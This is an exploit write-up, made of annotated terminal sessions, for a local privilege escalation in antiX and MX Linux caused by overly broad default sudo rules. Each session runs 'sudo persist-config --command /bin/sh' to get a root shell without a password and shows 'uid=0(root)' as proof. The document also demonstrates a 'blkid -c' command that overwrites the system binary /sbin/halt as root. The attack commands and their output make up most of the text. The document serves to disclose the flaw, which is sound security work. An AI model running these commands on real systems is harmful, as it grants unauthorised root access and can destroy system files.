Local privilege escalation (LPE) exploit of antiX/MX Linux
# OS version | |
m4x@antix1:~ | |
$ cat /etc/issue | |
Welcome to antiX. Powered by Debian. | |
m4x@antix1:~ | |
$ uname -a | |
Linux antix1 4.9.193-antix.1-amd64-smp #1 SMP PREEMPT Fri Sep 20 20:30:09 BST 2019 x86_64 GNU/Linux | |
m4x@antix1:~ | |
$ lsb_release -a | |
No LSB modules are available. | |
Distributor ID: Debian | |
Description: Debian GNU/Linux 10 (buster) | |
Release: 10 | |
Codename: buster | |
# exploit | |
m4x@antix1:~ | |
$ id | |
uid=1000(m4x) gid=1000(m4x) groups=1000(m4x),7(lp),20(dialout),24(cdrom),25(floppy),27(sudo),29(audio),30(dip),44(video),46(plugdev),100(users),109(netdev),112(lpadmin),113(scanner),114(vboxsf) | |
m4x@antix1:~ | |
$ sudo -l | |
Matching Defaults entries for m4x on antix1: | |
env_reset, mail_badpass, | |
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, | |
!requiretty, !tty_tickets | |
Runas and Command-specific defaults for m4x: | |
Defaults!/usr/local/bin/menu_manager.sh env_keep+=HOME | |
User m4x may run the following commands on antix1: | |
(ALL : ALL) ALL | |
(root) NOPASSWD: /sbin/halt | |
(root) NOPASSWD: /sbin/poweroff | |
(root) NOPASSWD: /sbin/reboot | |
(root) NOPASSWD: /sbin/blkid | |
(root) NOPASSWD: /sbin/fdisk.distrib | |
(root) NOPASSWD: /usr/bin/ceni | |
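(root) NOPASSWD: /usr/local/bin/persist-config <==== bug here: the rule places no restriction on arguments and persist-config accepts --command, so it runs any program as root without a password | |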
(root) NOPASSWD: /usr/local/bin/persist-save | |
(root) NOPASSWD: /usr/sbin/minstall | |
(root) NOPASSWD: /usr/local/bin/antixsources.sh | |
(root) NOPASSWD: /usr/local/bin/connectshares.sh | |
(root) NOPASSWD: /usr/local/bin/disconnectshares.sh | |
(root) NOPASSWD: /bin/chvt | |
(root) NOPASSWD: /usr/local/bin/menu_manager.sh | |
(root) NOPASSWD: /usr/sbin/pm-hibernate | |
(root) NOPASSWD: /usr/sbin/pm-suspend | |
(root) NOPASSWD: /usr/local/bin/update-default-desktop | |
m4x@antix1:~ | |
$ sudo /usr/local/bin/persist-config --command /bin/sh | |
# id | |
uid=0(root) gid=0(root) groups=0(root) | |
# |
m4x@mx:~/Desktop | |
$ sudo -l | |
Matching Defaults entries for m4x on mx: | |
env_reset, mail_badpass, | |
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, !requiretty, | |
!tty_tickets | |
Runas and Command-specific defaults for m4x: | |
Defaults!/usr/local/bin/menu_manager.sh env_keep+=HOME | |
User m4x may run the following commands on mx: | |
(ALL : ALL) ALL | |
(root) NOPASSWD: /sbin/halt | |
(root) NOPASSWD: /sbin/poweroff | |
(root) NOPASSWD: /sbin/reboot | |
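(root) NOPASSWD: /sbin/blkid <==== also unsafe: the rule places no restriction on arguments, and blkid -c writes its cache file to the given path as root (shown below) | |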
(root) NOPASSWD: /sbin/fdisk.distrib | |
(root) NOPASSWD: /usr/bin/ceni | |
(root) NOPASSWD: /usr/local/bin/persist-config | |
(root) NOPASSWD: /usr/local/bin/persist-save | |
(root) NOPASSWD: /usr/sbin/minstall | |
(root) NOPASSWD: /usr/local/bin/antixsources.sh | |
(root) NOPASSWD: /usr/local/bin/connectshares.sh | |
(root) NOPASSWD: /usr/local/bin/disconnectshares.sh | |
(root) NOPASSWD: /bin/chvt | |
(root) NOPASSWD: /usr/local/bin/menu_manager.sh | |
(root) NOPASSWD: /usr/sbin/pm-hibernate | |
(root) NOPASSWD: /usr/sbin/pm-suspend | |
(root) NOPASSWD: /usr/local/bin/update-default-desktop | |
(root) NOPASSWD: /usr/lib/mx-tweak/backlight-brightness | |
m4x@mx:~/Desktop | |
$ ls -l /sbin/halt | |
-rwxr-xr-x 1 root root 18888 Feb 14 2019 /sbin/halt | |
m4x@mx:~/Desktop | |
$ sudo /sbin/blkid -c /sbin/halt | |
/dev/sr0: UUID="2019-06-13-05-24-38-00" LABEL="VMware Tools" TYPE="iso9660" | |
/dev/sda1: LABEL="rootMX19" UUID="b347b443-e474-4afd-97bc-bc91f180e7c5" TYPE="ext4" PARTUUID="b46d7286-01" | |
/dev/sda2: LABEL="swapMX" UUID="9933b310-575c-4caa-a335-79b165ee7d89" TYPE="swap" PARTUUID="b46d7286-02" | |
m4x@mx:~/Desktop | |
$ sudo cat /sbin/halt | |
<device DEVNO="0x0b00" TIME="1584329636.32005" UUID="2019-06-13-05-24-38-00" LABEL="VMware Tools" TYPE="iso9660">/dev/sr0</device> | |
<device DEVNO="0x0801" TIME="1584329636.35739" LABEL="rootMX19" UUID="b347b443-e474-4afd-97bc-bc91f180e7c5" TYPE="ext4" PARTUUID="b46d7286-01">/dev/sda1</device> | |
<device DEVNO="0x0802" TIME="1584329636.38616" LABEL="swapMX" UUID="9933b310-575c-4caa-a335-79b165ee7d89" TYPE="swap" PARTUUID="b46d7286-02">/dev/sda2</device> | |
# OS version | |
m4x@M4x-PC:~ | |
$ screenfetch | |
_,met$$$$$gg. m4x@M4x-PC | |
,g$$$$$$$$$$$$$$$P. OS: Debian 10 buster | |
,g$$P"" """Y$$.". Kernel: x86_64 Linux 4.19.0-6-amd64 | |
,$$P' `$$$. Uptime: 25m | |
',$$P ,ggs. `$$b: Packages: 1970 | |
`d$$' ,$P"' . $$$ Shell: bash 5.0.3 | |
$$P d$' , $$P Resolution: 3838x1819 | |
$$: $$. - ,d$$' DE: XFCE | |
$$\; Y$b._ _,d$P' WM: Xfwm4 | |
Y$$. `.`"Y$$$$P"' WM Theme: Arc-Dark | |
`$$b "-.__ GTK Theme: Greybird-mx [GTK2] | |
`Y$$ Icon Theme: Papirus | |
`Y$$. Font: Noto Sans 10.5 | |
`$$b. CPU: Intel Core i7-8650U @ 2.112GHz | |
`Y$$b. GPU: llvmpipe (LLVM 7.0, 256 bits) | |
`"Y$b._ RAM: 832MiB / 1970MiB | |
`"""" | |
m4x@M4x-PC:~ | |
$ cat /etc/issue | |
Welcome to MX Linux! Powered by Debian. | |
# exploit | |
m4x@M4x-PC:~ | |
$ id | |
uid=1000(m4x) gid=1000(m4x) groups=1000(m4x),7(lp),20(dialout),24(cdrom),25(floppy),27(sudo),29(audio),30(dip),44(video),46(plugdev),100(users),109(netdev),111(lpadmin),118(scanner),125(vboxsf) | |
m4x@M4x-PC:~ | |
$ sudo -l | |
Matching Defaults entries for m4x on M4x-PC: | |
env_reset, mail_badpass, | |
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, !requiretty, | |
!tty_tickets | |
Runas and Command-specific defaults for m4x: | |
Defaults!/usr/local/bin/menu_manager.sh env_keep+=HOME | |
User m4x may run the following commands on M4x-PC: | |
(ALL : ALL) ALL | |
(root) NOPASSWD: /sbin/halt | |
(root) NOPASSWD: /sbin/poweroff | |
(root) NOPASSWD: /sbin/reboot | |
(root) NOPASSWD: /sbin/blkid | |
(root) NOPASSWD: /sbin/fdisk.distrib | |
(root) NOPASSWD: /usr/bin/ceni | |
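(root) NOPASSWD: /usr/local/bin/persist-config <======= bug here: the rule places no restriction on arguments and persist-config accepts --command, so it runs any program as root without a password | |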
(root) NOPASSWD: /usr/local/bin/persist-save | |
(root) NOPASSWD: /usr/sbin/minstall | |
(root) NOPASSWD: /usr/local/bin/antixsources.sh | |
(root) NOPASSWD: /usr/local/bin/connectshares.sh | |
(root) NOPASSWD: /usr/local/bin/disconnectshares.sh | |
(root) NOPASSWD: /bin/chvt | |
(root) NOPASSWD: /usr/local/bin/menu_manager.sh | |
(root) NOPASSWD: /usr/sbin/pm-hibernate | |
(root) NOPASSWD: /usr/sbin/pm-suspend | |
(root) NOPASSWD: /usr/local/bin/update-default-desktop | |
m4x@M4x-PC:~ | |
$ sudo /usr/local/bin/persist-config --command /bin/sh | |
# id | |
uid=0(root) gid=0(root) groups=0(root) | |
# |